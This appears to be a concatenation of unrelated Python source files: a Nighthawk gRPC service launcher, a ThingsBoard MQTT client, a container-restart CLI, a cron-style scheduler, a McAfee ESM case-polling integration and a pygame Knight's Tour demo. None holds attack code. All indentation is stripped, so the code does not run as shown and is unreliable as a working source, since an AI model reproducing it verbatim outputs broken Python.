server_ip: IP address used by the gRPC service to listen.
server_port: An integer, indicates the port used by the gRPC service to listen. 0 means that the server is not listening.
"""
def __init__(self, server_binary_path, server_ip, ip_version):
"""Initializes Nighthawk gRPC service.
Args:
server_binary_path: A string, indicates where the nighthawk gRPC service binary resides
server_ip: IP address, indicates which ip address should be used by the gRPC service listener.
ip_version: IP Version, indicates if IPv4 or IPv6 should be used.
...
"""
assert ip_version != IpVersion.UNKNOWN
self.server_port = 0
self.server_ip = server_ip
self._server_process = None
self._ip_version = ip_version
self._server_binary_path = server_binary_path
self._socket_type = socket.AF_INET6 if ip_version == IpVersion.IPV6 else socket.AF_INET
self._server_thread = threading.Thread(target=self._serverThreadRunner)
self._address_file = None
def _serverThreadRunner(self):
with tempfile.NamedTemporaryFile(mode="w", delete=False, suffix=".tmp") as tmp:
self._address_file = tmp.name
args = [
self._server_binary_path, "--listener-address-file", self._address_file, "--listen",
"%s:0" % str(self.server_ip)
]
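# Listening on port 0 lets the OS pick a free port; the service writes the
# address it actually bound to into --listener-address-file, which
# _waitUntilServerListening() polls to discover the port.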
logging.info("Nighthawk grpc service popen() args: [%s]" % args)
self._server_process = subprocess.Popen(args)
self._server_process.communicate()
self._address_file = None
def _waitUntilServerListening(self):
tries = 30
while tries > 0:
contents = ""
try:
with open(self._address_file) as f:
contents = f.read().strip()
except IOError:
pass
if contents != "":
tmp = contents.split(":")
assert (len(tmp) >= 2)
self.server_port = int(tmp[len(tmp) - 1])
return True
time.sleep(0.5)
tries -= 1
logging.error("Timeout while waiting for server listener at %s:%s to accept connections.",
self.server_ip, self.server_port)
return False
def start(self):
"""
Starts the Nighthawk gRPC service. Returns True upon success, after which the server_port attribute
can be queried to get the listening port.
"""
self._server_thread.daemon = True
self._server_thread.start()
return self._waitUntilServerListening()
def stop(self):
"""
Signals the Nighthawk gRPC service to stop, waits for its termination, and returns the exit code of the associated process.
"""
self._server_process.terminate()
self._server_thread.join()
self.server_port = 0
return self._server_process.returncode
|
tb_device_mqtt.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import queue
import ssl
import time
from simplejson import loads, dumps
from threading import RLock
from threading import Thread
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
import paho.mqtt.client as paho
from jsonschema import Draft7Validator
from jsonschema import ValidationError
KV_SCHEMA = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number"]}
},
"minProperties": 1,
}
SCHEMA_FOR_CLIENT_RPC = {
"type": "object",
"patternProperties":
{
".": {"type": ["integer",
"string",
"boolean",
"number"]}
},
"minProperties": 0,
}
TS_KV_SCHEMA = {
"type": "object",
"properties": {
"ts": {
"type": ["integer"]
},
"values": KV_SCHEMA
},
"additionalProperties": False
}
DEVICE_TS_KV_SCHEMA = {
"type": "array",
"items": TS_KV_SCHEMA
}
DEVICE_TS_OR_KV_SCHEMA = {
"type": "array",
"items": {
"anyOf":
[
TS_KV_SCHEMA,
KV_SCHEMA
]
}
}
RPC_VALIDATOR = Draft7Validator(SCHEMA_FOR_CLIENT_RPC)
KV_VALIDATOR = Draft7Validator(KV_SCHEMA)
TS_KV_VALIDATOR = Draft7Validator(TS_KV_SCHEMA)
DEVICE_TS_KV_VALIDATOR = Draft7Validator(DEVICE_TS_KV_SCHEMA)
DEVICE_TS_OR_KV_VALIDATOR = Draft7Validator(DEVICE_TS_OR_KV_SCHEMA)
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
log = logging.getLogger("tb_connection")
log.setLevel(logging.DEBUG)
class TBTimeoutException(Exception):
pass
class TBQoSException(Exception):
pass
class TBPublishInfo:
TB_ERR_AGAIN = -1
TB_ERR_SUCCESS = 0
TB_ERR_NOMEM = 1
TB_ERR_PROTOCOL = 2
TB_ERR_INVAL = 3
TB_ERR_NO_CONN = 4
TB_ERR_CONN_REFUSED = 5
TB_ERR_NOT_FOUND = 6
TB_ERR_CONN_LOST = 7
TB_ERR_TLS = 8
TB_ERR_PAYLOAD_SIZE = 9
TB_ERR_NOT_SUPPORTED = 10
TB_ERR_AUTH = 11
TB_ERR_ACL_DENIED = 12
TB_ERR_UNKNOWN = 13
TB_ERR_ERRNO = 14
TB_ERR_QUEUE_SIZE = 15
def __init__(self, message_info):
self.message_info = message_info
def rc(self):
return self.message_info.rc
def mid(self):
return self.message_info.mid
def get(self):
self.message_info.wait_for_publish()
return self.message_info.rc
class TBDeviceMqttClient:
def __init__(self, host, port=1883, token=None):
self._client = paho.Client()
self.__host = host
self.__port = port
if token == "":
log.warning("token is not set, connection without tls wont be established")
else:
self._client.username_pw_set(token)
self._lock = RLock()
self._attr_request_dict = {}
self.stopped = False
self.__timeout_queue = queue.Queue()
self.__timeout_thread = Thread(target=self.__timeout_check)
self.__timeout_thread.daemon = True
self.__timeout_thread.start()
self.__is_connected = False
self.__device_on_server_side_rpc_response = None
self.__connect_callback = None
self.__device_max_sub_id = 0
self.__device_client_rpc_number = 0
self.__device_sub_dict = {}
self.__device_client_rpc_dict = {}
self.__attr_request_number = 0
self._client.on_connect = self._on_connect
self._client.on_log = self._on_log
self._client.on_publish = self._on_publish
self._client.on_message = self._on_message
self._client.on_disconnect = self._on_disconnect
def _on_log(self, client, userdata, level, buf):
log.exception(buf)
def _on_publish(self, client, userdata, result):
# log.debug("Data published to ThingsBoard!")
pass
def _on_disconnect(self, client, userdata, rc):
log.debug(client)
log.debug("Disconnected")
def _on_connect(self, client, userdata, flags, rc, *extra_params):
result_codes = {
1: "incorrect protocol version",
2: "invalid client identifier",
3: "server unavailable",
4: "bad username or password",
5: "not authorised",
}
if self.__connect_callback:
self.__connect_callback(client, userdata, flags, rc, *extra_params)
if rc == 0:
self.__is_connected = True
log.info("connection SUCCESS")
log.debug(client)
self._client.subscribe(ATTRIBUTES_TOPIC, qos=1)
self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", 1)
self._client.subscribe(RPC_REQUEST_TOPIC + '+')
self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=1)
else:
if rc in result_codes:
log.error("connection FAIL with error {rc} {explanation}".format(rc=rc,
explanation=result_codes[rc]))
else:
log.error("connection FAIL with unknown error")
def is_connected(self):
return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None, key_file=None, keepalive=60):
if tls:
self._client.tls_set(ca_certs=ca_certs,
certfile=cert_file,
keyfile=key_file,
cert_reqs=ssl.CERT_REQUIRED,
tls_version=ssl.PROTOCOL_TLSv1_2,
ciphers=None)
self._client.tls_insecure_set(False)
self._client.connect(self.__host, self.__port, keepalive=keepalive)
self.reconnect_delay_set(min_reconnect_delay, timeout)
self._client.loop_start()
self.__connect_callback = callback
def disconnect(self):
self._client.disconnect()
log.debug(self._client)
log.debug("Disconnecting from ThingsBoard")
self.__is_connected = False
self._client.loop_stop()
def stop(self):
self.stopped = True
def _on_message(self, client, userdata, message):
content = TBUtility.decode(message)
self._on_decoded_message(content, message)
@staticmethod
def validate(validator, data):
try:
validator.validate(data)
except ValidationError as e:
log.error(e)
raise e
def _on_decoded_message(self, content, message):
if message.topic.startswith(RPC_REQUEST_TOPIC):
request_id = message.topic[len(RPC_REQUEST_TOPIC):len(message.topic)]
if self.__device_on_server_side_rpc_response:
self.__device_on_server_side_rpc_response(request_id, content)
elif message.topic.startswith(RPC_RESPONSE_TOPIC):
with self._lock:
request_id = int(message.topic[len(RPC_RESPONSE_TOPIC):len(message.topic)])
callback = self.__device_client_rpc_dict.pop(request_id)
callback(request_id, content, None)
elif message.topic == ATTRIBUTES_TOPIC:
dict_results = []
with self._lock:
# callbacks for everything
if self.__device_sub_dict.get("*"):
for x in self.__device_sub_dict["*"]:
dict_results.append(self.__device_sub_dict["*"][x])
# specific callback
keys = content.keys()
keys_list = []
for key in keys:
keys_list.append(key)
# iterate through message
for key in keys_list:
# find key in our dict
if self.__device_sub_dict.get(key):
for x in self.__device_sub_dict[key]:
dict_results.append(self.__device_sub_dict[key][x])
for res in dict_results:
res(content, None)
elif message.topic.startswith(ATTRIBUTES_TOPIC_RESPONSE):
with self._lock:
req_id = int(message.topic[len(ATTRIBUTES_TOPIC+"/response/"):])
# pop callback and use it
callback = self._attr_request_dict.pop(req_id)
callback(content, None)
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way through their network flow at once.
Defaults to 20. Increasing this value will consume more memory but can increase throughput."""
self._client.max_inflight_messages_set(inflight)
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of outgoing messages with QoS>0 that can be pending in the outgoing message queue.
Defaults to 0. 0 means unlimited. When the queue is full, any further outgoing messages will be dropped."""
self._client.max_queued_messages_set(queue_size)
def reconnect_delay_set(self, min_delay=1, max_delay=120):
"""The client will automatically retry connection. Between each attempt it will wait a number of seconds
between min_delay and max_delay. When the connection is lost, initially the reconnection attempt is delayed
of min_delay seconds. It’s doubled between subsequent attempt up to max_delay. The delay is reset to min_delay
when the connection complete (e.g. the CONNACK is received, not just the TCP connection is established)."""
self._client.reconnect_delay_set(min_delay, max_delay)
def send_rpc_reply(self, req_id, resp, quality_of_service=1, wait_for_publish=False):
if quality_of_service != 0 and quality_of_service != 1:
log.error("Quality of service (qos) value must be 0 or 1")
return
info = self._client.publish(RPC_RESPONSE_TOPIC + req_id, resp, qos=quality_of_service)
if wait_for_publish:
info.wait_for_publish()
def send_rpc_call(self, method, params, callback):
self.validate(RPC_VALIDATOR, params)
with self._lock:
self.__device_client_rpc_number += 1
self.__device_client_rpc_dict.update({self.__device_client_rpc_number: callback})
rpc_request_id = self.__device_client_rpc_number
payload = {"method": method, "params": params}
self._client.publish(RPC_REQUEST_TOPIC + str(rpc_request_id),
dumps(payload),
qos=1)
def set_server_side_rpc_request_handler(self, handler):
self.__device_on_server_side_rpc_response = handler
def publish_data(self, data, topic, qos):
data = dumps(data)
if qos != 0 and qos != 1:
log.exception("Quality of service (qos) value must be 0 or 1")
raise TBQoSException("Quality of service (qos) value must be 0 or 1")
else:
return TBPublishInfo(self._client.publish(topic, data, qos))
def send_telemetry(self, telemetry, quality_of_service=1):
if type(telemetry) is not list:
telemetry = [telemetry]
self.validate(DEVICE_TS_OR_KV_VALIDATOR, telemetry)
return self.publish_data(telemetry, TELEMETRY_TOPIC, quality_of_service)
def send_attributes(self, attributes, quality_of_service=1):
self.validate(KV_VALIDATOR, attributes)
return self.publish_data(attributes, ATTRIBUTES_TOPIC, quality_of_service)
def unsubscribe_from_attribute(self, subscription_id):
with self._lock:
for x in self.__device_sub_dict:
if self.__device_sub_dict[x].get(subscription_id):
del self.__device_sub_dict[x][subscription_id]
log.debug("Unsubscribed from {attribute}, subscription id {sub_id}".format(attribute=x,
sub_id=subscription_id))
if subscription_id == '*':
self.__device_sub_dict = {}
self.__device_sub_dict = dict((k, v) for k, v in self.__device_sub_dict.items() if v)  # drop keys with no remaining callbacks
def subscribe_to_all_attributes(self, callback):
return self.subscribe_to_attribute("*", callback)
def subscribe_to_attribute(self, key, callback):
with self._lock:
self.__device_max_sub_id += 1
if key not in self.__device_sub_dict:
self.__device_sub_dict.update({key: {self.__device_max_sub_id: callback}})
else:
self.__device_sub_dict[key].update({self.__device_max_sub_id: callback})
log.debug("Subscribed to {key} with id {id}".format(key=key, id=self.__device_max_sub_id))
return self.__device_max_sub_id
def request_attributes(self, client_keys=None, shared_keys=None, callback=None):
msg = {}
if client_keys:
tmp = ""
for key in client_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"clientKeys": tmp})
if shared_keys:
tmp = ""
for key in shared_keys:
tmp += key + ","
tmp = tmp[:len(tmp) - 1]
msg.update({"sharedKeys": tmp})
ts_in_millis = int(round(time.time() * 1000))
attr_request_number = self._add_attr_request_callback(callback)
info = self._client.publish(topic=ATTRIBUTES_TOPIC_REQUEST + str(self.__attr_request_number),
payload=dumps(msg),
qos=1)
self._add_timeout(attr_request_number, ts_in_millis + 30000)
return info
def _add_timeout(self, attr_request_number, ts):
self.__timeout_queue.put({"ts": ts, "attribute_request_id": attr_request_number})
def _add_attr_request_callback(self, callback):
with self._lock:
self.__attr_request_number += 1
self._attr_request_dict.update({self.__attr_request_number: callback})
attr_request_number = self.__attr_request_number
return attr_request_number
def __timeout_check(self):
while not self.stopped:
try:
if not self.__timeout_queue.empty():
item = self.__timeout_queue.get_nowait()
if item is not None:
while not self.stopped:
current_ts_in_millis = int(round(time.time() * 1000))
if current_ts_in_millis > item["ts"]:
break
else:
time.sleep(0.001)
with self._lock:
callback = None
if item.get("attribute_request_id"):
if self._attr_request_dict.get(item["attribute_request_id"]):
callback = self._attr_request_dict.pop(item["attribute_request_id"])
elif item.get("rpc_request_id"):
if self.__device_client_rpc_dict.get(item["rpc_request_id"]):
callback = self.__device_client_rpc_dict.pop(item["rpc_request_id"])
if callback is not None:
callback(None, TBTimeoutException("Timeout while waiting for reply from ThingsBoard!"))
else:
time.sleep(0.01)
except Exception as e:
log.warning(e)
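# --- Minimal usage sketch (not part of the original module): it assumes a
# ThingsBoard MQTT broker reachable on "localhost" and a valid device access
# token "DEVICE_TOKEN"; both values are placeholders.
if __name__ == '__main__':
client = TBDeviceMqttClient("localhost", 1883, "DEVICE_TOKEN")
client.connect()
while not client.is_connected():  # connect() is asynchronous (loop_start)
time.sleep(0.1)
# Publish one telemetry sample and block until the broker acknowledges it.
client.send_telemetry({"temperature": 21.5}).get()
# React to attribute updates pushed by the platform.
client.subscribe_to_all_attributes(lambda content, error: log.info(content))
time.sleep(5)
client.disconnect()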
|
cli.py
|
# coding:utf-8
import sys
import logging
import argparse
import threading
import time
import os
from six.moves import queue
from captain_comeback.index import CgroupIndex
from captain_comeback.cgroup import Cgroup
from captain_comeback.restart.engine import RestartEngine, restart
from captain_comeback.activity.engine import ActivityEngine
logger = logging.getLogger()
DEFAULT_ROOT_CG = "/sys/fs/cgroup/memory/docker"
DEFAULT_ACTIVITY_DIR = "/var/log/container-activity"
DEFAULT_SYNC_TARGET_INTERVAL = 1
DEFAULT_RESTART_GRACE_PERIOD = 10
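# Both the sync interval and the restart grace period are expressed in seconds.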
def run_loop(root_cg_path, activity_path, sync_target_interval,
restart_grace_period):
threading.current_thread().name = "index"
job_queue = queue.Queue()
activity_queue = queue.Queue()
index = CgroupIndex(root_cg_path, job_queue, activity_queue)
index.open()
restarter = RestartEngine(restart_grace_period, job_queue, activity_queue)
restarter_thread = threading.Thread(target=restarter.run, name="restarter")
restarter_thread.daemon = True
activity = ActivityEngine(activity_path, activity_queue)
activity_thread = threading.Thread(target=activity.run, name="activity")
activity_thread.daemon = True
# Now, fire an initial sync, then empty the activity queue (we don't want
# to fire notifications for "new" containers if Captain Comeback is the one
# that's starting), and start all worker threads.
index.sync()
while True:
try:
activity_queue.get_nowait()
except queue.Empty:
break
restarter_thread.start()
activity_thread.start()
while True:
index.sync()
next_sync = time.time() + sync_target_interval
while True:
poll_timeout = next_sync - time.time()
if poll_timeout <= 0:
break
logger.debug("poll with timeout: %s", poll_timeout)
index.poll(poll_timeout)
for thread in [activity_thread, restarter_thread]:
if not thread.is_alive():
logger.critical("thread %s is dead", thread.name)
return 1
return 0
def restart_one(root_cg, grace_period, container_id):
q = queue.Queue()
cg = Cgroup(os.path.join(root_cg, container_id))
try:
restart(grace_period, cg, q, q)
except IOError:
logger.error("%s: container does not exist", cg.name())
return 1
finally:
while not q.empty():
m = q.get()
logger.debug("%s: received %s", cg.name(), m.__class__.__name__)
return 0
def main_wrapper(args):
desc = "Autorestart containers that exceed their memory allocation"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("--root-cg",
default=DEFAULT_ROOT_CG,
help="parent cgroup (children will be monitored)")
parser.add_argument("--activity",
default=DEFAULT_ACTIVITY_DIR,
help="where to log activity")
parser.add_argument("--sync-interval",
default=DEFAULT_SYNC_TARGET_INTERVAL, type=float,
help="target sync interval to refresh cgroups")
parser.add_argument("--restart-grace-period",
default=DEFAULT_RESTART_GRACE_PERIOD, type=int,
help="how long to wait before sending SIGKILL")
parser.add_argument("--debug", default=False, action="store_true",
help="enable debug logging")
parser.add_argument("--restart", dest="container_id",
help="restart one container and exit")
ns = parser.parse_args(args)
log_level = logging.DEBUG if ns.debug else logging.INFO
log_format = "%(asctime)-15s %(levelname)-8s %(threadName)-10s -- " \
"%(message)s"
logging.basicConfig(level=log_level, format=log_format)
logger.setLevel(log_level)
sync_interval = ns.sync_interval
if sync_interval < 0:
logger.warning("invalid sync interval %s, must be > 0", sync_interval)
sync_interval = DEFAULT_SYNC_TARGET_INTERVAL
restart_grace_period = ns.restart_grace_period
if restart_grace_period < 0:
logger.warning("invalid restart grace period %s, must be > 0",
restart_grace_period)
restart_grace_period = DEFAULT_RESTART_GRACE_PERIOD
# If the --restart argument is present, just restart one container and
# exit.
if ns.container_id:
return restart_one(ns.root_cg, restart_grace_period, ns.container_id)
# Otherwise the --restart argument was not there, start the main loop.
return run_loop(ns.root_cg, ns.activity, sync_interval,
restart_grace_period)
def cli_entrypoint():
sys.exit(main_wrapper(sys.argv[1:]))
if __name__ == "__main__":
cli_entrypoint()
|
scheduler.py
|
import calendar
import ctypes
import datetime
import logging
import sched
import threading
from threading import Thread
from typing import Callable, List
from crontab import CronTab
from injector import Module, inject, singleton
from prometheus_client.metrics import Gauge
from rep0st.framework.execute import execute
from rep0st.framework.signal_handler import on_shutdown
log = logging.getLogger(__name__)
framework_scheduler_tasks_running_z = Gauge(
'framework_scheduler_tasks_running', 'Number of tasks currently running.')
framework_scheduler_tasks_scheduled_z = Gauge(
'framework_scheduler_tasks_scheduled',
'Number of tasks scheduled to be run in the future.')
framework_scheduler_exit_z = Gauge('framework_scheduler_exit',
'Set to 1 if the scheduler is marked exit.')
class SchedulerModule(Module):
def configure(self, binder):
binder.bind(Scheduler)
class _SignalFinish(Exception):
pass
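# _Schedule wraps an optional crontab expression. The special timespec
# 'oneshot' leaves crontab unset, so next() returns "now" and should_loop()
# is falsy: the task runs once, immediately, and is not rescheduled.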
class _Schedule:
crontab: CronTab = None
@classmethod
def from_str(cls, timespec: str):
s = _Schedule()
if timespec != 'oneshot':
s.crontab = CronTab(timespec)
return s
def next(self, now: datetime.datetime):
if self.crontab:
return self.crontab.next(now=now, delta=False, default_utc=True)
else:
return now
def should_loop(self):
return self.crontab
@singleton
class Scheduler:
exit: threading.Event
scheduler: sched.scheduler
running_tasks: List[Thread]
@inject
def __init__(self) -> None:
self.exit = threading.Event()
self.scheduler = sched.scheduler(self._get_utc_time, self.exit.wait)
self.running_tasks = []
framework_scheduler_tasks_running_z.set_function(
lambda: len(self.running_tasks))
framework_scheduler_tasks_scheduled_z.set_function(
lambda: len(self.scheduler.queue))
framework_scheduler_exit_z.set_function(lambda: self.exit.is_set())
def _get_utc_time(self) -> float:
dts = datetime.datetime.utcnow()
return calendar.timegm(dts.utctimetuple()) + dts.microsecond / 1e6
def _run_task(self, schedule: _Schedule, fun: Callable[[], None]) -> None:
log.debug(f'Executing job {fun.__module__}.{fun.__name__}')
try:
fun()
except _SignalFinish:
pass
except:
log.exception(f'Error executing job {fun.__name__}')
finally:
if not self.exit.is_set():
if not schedule.should_loop():
log.debug(f'Task {fun} will not be scheduled again')
else:
self._schedule_task(schedule, fun)
self.running_tasks.remove(threading.current_thread())
def _schedule_handler(self, schedule: _Schedule, fun: Callable[[],
None]) -> None:
thread = Thread(
name=f'Job {fun.__module__}.{fun.__name__}',
target=self._run_task,
kwargs={
'schedule': schedule,
'fun': fun
},
daemon=True)
self.running_tasks.append(thread)
thread.start()
def _schedule_task(self, schedule: _Schedule, fun: Callable[[],
None]) -> None:
if self.exit.is_set():
return
now = self._get_utc_time()
next_run_time = schedule.next(now)
log.debug(
f'Scheduling job {fun.__name__} to be run at {datetime.datetime.utcfromtimestamp(next_run_time)}'
)
self.scheduler.enterabs(
next_run_time,
1,
self._schedule_handler,
kwargs={
'schedule': schedule,
'fun': fun
})
def schedule(self, timespec: str, f: Callable[[], None]) -> None:
if not timespec:
log.debug(f'Task {f} is ignored as the timespec is empty')
return
self._schedule_task(_Schedule.from_str(timespec), f)
def _get_thread_id(self, t):
# returns id of the respective thread
if hasattr(t, '_thread_id'):
return t._thread_id
for id, thread in threading._active.items():
if thread is t:
return id
raise RuntimeError('not found')
@on_shutdown()
def handle_shutdown(self) -> None:
log.info('Shutting down scheduler')
self.exit.set()
with self.scheduler._lock:
for e in self.scheduler.queue:
self.scheduler.cancel(e)
log.info('Cancelled all jobs in job queue')
# Stop running jobs.
for t in self.running_tasks:
log.info(f'Sending finish signal to running {t.name}')
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(self._get_thread_id(t)),
ctypes.py_object(_SignalFinish))
if res == 0:
log.error('Invalid thread id')
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(
ctypes.c_long(self._get_thread_id(t)), 0)
log.error('Sending finish signal to thread failed')
for t in self.running_tasks:
log.info(f'Waiting 60 seconds for {t.name} to finish')
t.join(timeout=60)
if t.is_alive():
log.error('Job did not finish after 60 second timeout. Forcing stop...')
log.info('Finished scheduler shutdown')
def _has_work(self):
return len(self.running_tasks) > 0 or not self.scheduler.empty()
def _run_scheduler(self):
while not self.exit.is_set() and self._has_work():
self.scheduler.run()
@execute(order=float('inf'))
def run_scheduler(self) -> Thread:
thread = Thread(name='Scheduler', target=self._run_scheduler)
thread.start()
log.info(f'Started scheduler in thread {thread.name}')
return thread
|
mcafee_esm_case_polling.py
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use
# (c) Copyright IBM Corp. 2010, 2018. All Rights Reserved.
"""Polling implementation"""
import logging
import time
import json
import calendar
import jinja2
from datetime import datetime
from threading import Thread
from os.path import join, pardir, os
from resilient_circuits import ResilientComponent, handler
from fn_mcafee_esm.util.helper import check_config, get_authenticated_headers
from fn_mcafee_esm.components.mcafee_esm_get_list_of_cases import case_get_case_list
from fn_mcafee_esm.components.mcafee_esm_get_case_detail import case_get_case_detail
from resilient_circuits.template_functions import environment
from resilient import SimpleHTTPException
import resilient_circuits.template_functions as template_functions
log = logging.getLogger(__name__)
ESM_CASE_FIELD_NAME = "mcafee_esm_case_id"
class ESM_CasePolling(ResilientComponent):
"""Component that implements Resilient function 'mcafee_esm_edit_case"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(ESM_CasePolling, self).__init__(opts)
self.options = opts.get("fn_mcafee_esm", {})
# Check config file and change trust_cert to Boolean
self.options = check_config(self.options)
self.main()
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_mcafee_esm", {})
def main(self):
options = self.options
if int(options.get("esm_polling_interval", 0)) > 0:
# Add ds_to_millis to global for use in filters
ds_filter = {"ds_to_millis": ds_to_millis}
env = environment()
env.globals.update(ds_filter)
# Create and start polling thread
thread = Thread(target=self.esm_polling_thread)
thread.daemon = True
thread.start()
log.info("Polling for cases in ESM is occurring")
else:
log.info("Polling for cases in ESM is not occurring")
def esm_polling_thread(self):
while True:
case_list = case_get_case_list(self.options)
headers = get_authenticated_headers(self.options["esm_url"], self.options["esm_username"],
self.options["esm_password"], self.options["trust_cert"])
# Check cases in incidents
for case in case_list:
# If case is not currently an incident create one
if len(self._find_resilient_incident_for_req(case["id"])) == 0:
incident_payload = self.build_incident_dto(headers, case["id"])
self.create_incident(incident_payload)
# Amount of time (seconds) to wait to check cases again, defaults to 10 mins if not set
time.sleep(int(self.options.get("esm_polling_interval", 600)))
def build_incident_dto(self, headers, case_id):
current_path = os.path.dirname(os.path.realpath(__file__))
default_temp_file = join(current_path, pardir, "data/templates/esm_incident_mapping.jinja")
template_file = self.options.get("incident_template", default_temp_file)
try:
with open(template_file, 'r') as template:
log.debug("Reading template file")
case_details = case_get_case_detail(self.options, headers, case_id)
log.debug("Case details in dict form: {}".format(case_details))
incident_template = template.read()
return template_functions.render(incident_template, case_details)
except jinja2.exceptions.TemplateSyntaxError:
log.info("'incident_template' is not set correctly in config file.")
def create_incident(self, payload):
try:
resilient_client = self.rest_client()
uri = "/incidents"
payload_dict = json.loads(payload)
log.info("Creating incident with payload: {}".format(payload))
log.debug("Payload: {}".format(payload_dict))
response = resilient_client.post(uri=uri, payload=payload_dict)
return response
except SimpleHTTPException:
log.info("Something went wrong when attempting to create the Incident")
# Returns back list of incidents if there is one with the same case ID, else returns empty list
def _find_resilient_incident_for_req(self, esm_case_id):
r_incidents = []
query_uri = "/incidents/query?return_level=partial"
query = {
'filters': [{
'conditions': [
{
'field_name': 'properties.{}'.format(ESM_CASE_FIELD_NAME),
'method': 'equals',
'value': esm_case_id
},
{
'field_name': 'plan_status',
'method': 'equals',
'value': 'A'
}
]
}],
"sorts": [{
"field_name": "create_date",
"type": "desc"
}]
}
try:
r_incidents = self.rest_client().post(query_uri, query)
except SimpleHTTPException:
# Some versions of Resilient 30.2 onward have a bug that prevents query for numeric fields.
# To work around this issue, let's try a different query, and filter the results. (Expensive!)
query_uri = "/incidents/query?return_level=normal&field_handle={}".format(ESM_CASE_FIELD_NAME)
query = {
'filters': [{
'conditions': [
{
'field_name': 'properties.{}'.format(ESM_CASE_FIELD_NAME),
'method': 'has_a_value'
},
{
'field_name': 'plan_status',
'method': 'equals',
'value': 'A'
}
]
}]
}
r_incidents_tmp = self.rest_client().post(query_uri, query)
r_incidents = [r_inc for r_inc in r_incidents_tmp
if r_inc["properties"].get(ESM_CASE_FIELD_NAME) == esm_case_id]
return r_incidents
# Converts string datetime to milliseconds epoch
def ds_to_millis(val):
"""Assuming val is a string datetime, e.g. '05/17/2017 17:07:59' (GMT), convert to milliseconds epoch"""
if not val:
return val
try:
if len(val) != 19:
raise ValueError("Invalid timestamp length %s" % val)
ts_format = "%m/%d/%Y %H:%M:%S"
dt = datetime.strptime(val, ts_format)
return calendar.timegm(dt.utctimetuple()) * 1000
except Exception as e:
log.exception("%s Not in expected timestamp format MM/DD/YYY HH:MM:SS", val)
return None
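# e.g. ds_to_millis("05/17/2017 17:07:59") == 1495040879000 (milliseconds since the epoch, GMT)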
|
Knight_Tour.py
|
import pygame
from heapq import heappush, heappop
import random
import time
import ExtraWidgits
import ExtraWidgits_for_Pathfinders
from threading import Thread
import StartProcess
import Knight_Tour
RunClock=True
class Knight():
def __init__(self, v, speed):
self.n = v
self.cb = [[0 for x in range(v)] for y in range(v)]
self.ans = []
self.speed = speed
self.WaitForEndProcess=True
self.operations=0
self.running=True
pygame.init()
self.SIDE = 600
self.block = self.SIDE // self.n
self.win = pygame.display.set_mode((self.SIDE+450, self.SIDE))
self.K_SIDE = (self.block * 3) // 4
self.knight_img = pygame.image.load('Images/knight2.png')
self.knight_img = pygame.transform.scale(self.knight_img, (self.K_SIDE, self.K_SIDE))
self.WHITE = (255, 255, 255)
self.BLACK = (0, 0, 0)
self.RED = (255, 0, 0)
pygame.display.set_caption("KNIGHT'S TOUR")
self.x = self.block // 2
self.y = self.block // 2
self.x1 = (self.block - self.K_SIDE) // 2
self.line_w = -int(-70 // self.n)
self.StartVisualization()
def StartVisualization(self):
self.grid()
AddClock = ExtraWidgits.Clock(self.win, 850, 100, 25)
AddClock.start()
AddExitText = ExtraWidgits.ExitText(self.win,725,250)
AddExitText.start()
AddMainMenuButton = ExtraWidgits_for_Pathfinders.MainMenuButton(self.win,700,300)
AddMainMenuButton.start()
StartSolving=Thread(target=self.solve)
StartSolving.start()
self.CheckActions()
def CheckActions(self):
self.X = 700
self.Y = 300
while (self.running):
try:
self.pos = pygame.mouse.get_pos()
except:
pass
for event in pygame.event.get():
if event.type==pygame.QUIT:
self.running=False
pygame.quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.running = False
pygame.quit()
if self.pos[0] > self.X and self.pos[0] < self.X + 240 and self.pos[1] > self.Y and self.pos[
1] < self.Y + 35:
if event.type == pygame.MOUSEBUTTONDOWN:
try:
self.running=False
pygame.quit()
while(self.WaitForEndProcess):
pass
Process = StartProcess.START()
Process.start()
Knight_Tour.RunClock=True
except:
pass
def grid(self):
for i in range(self.n):
for j in range(self.n):
if not self.running:
break
if ((i + j) % 2 == 0):
color = self.WHITE
else:
color = self.BLACK
pygame.draw.rect(self.win, color, (i * self.block, j * self.block, self.block, self.block))
if ([i, j] in self.ans):
color = (0, 180, 0)
pygame.draw.rect(self.win, (120, 255, 0),
(self.x1 + i * self.block, self.x1 + j * self.block, self.K_SIDE, self.K_SIDE))
def show(self):
self.grid()
xx, yy = self.ans[0]
for i in range(1, len(self.ans)):
if not self.running:
break
tx, ty = self.ans[i]
pygame.draw.line(self.win, (255, 0, 0), (self.x + xx * self.block, self.x + yy * self.block),
(self.x + tx * self.block, self.x + ty * self.block), self.line_w)
xx, yy = self.ans[i]
self.win.blit(self.knight_img, (self.x1 + xx * self.block, self.x1 + yy * self.block))
update_display=pygame.Rect(0,0,self.SIDE,self.SIDE)
pygame.display.update(update_display)
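# solve() follows Warnsdorff's heuristic: every legal knight move from the
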